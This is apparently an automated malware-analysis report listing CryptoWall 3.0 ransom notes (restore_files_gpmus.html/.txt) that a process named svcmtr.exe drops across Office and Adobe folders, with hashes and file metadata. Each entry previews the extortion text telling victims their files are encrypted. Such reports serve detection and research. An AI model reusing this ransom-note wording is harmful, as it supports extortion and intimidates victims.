                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Templates\1033\FAX\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\ARM\Reader_15.023.20070\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\ARM\Reader_15.023.20070\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\ARM\Reader_17.012.20098\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\ARM\Reader_17.012.20098\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\ARM\Reader_19.010.20098\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\ARM\Reader_19.010.20098\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\ARM\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\ARM\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\Setup\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\Setup\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
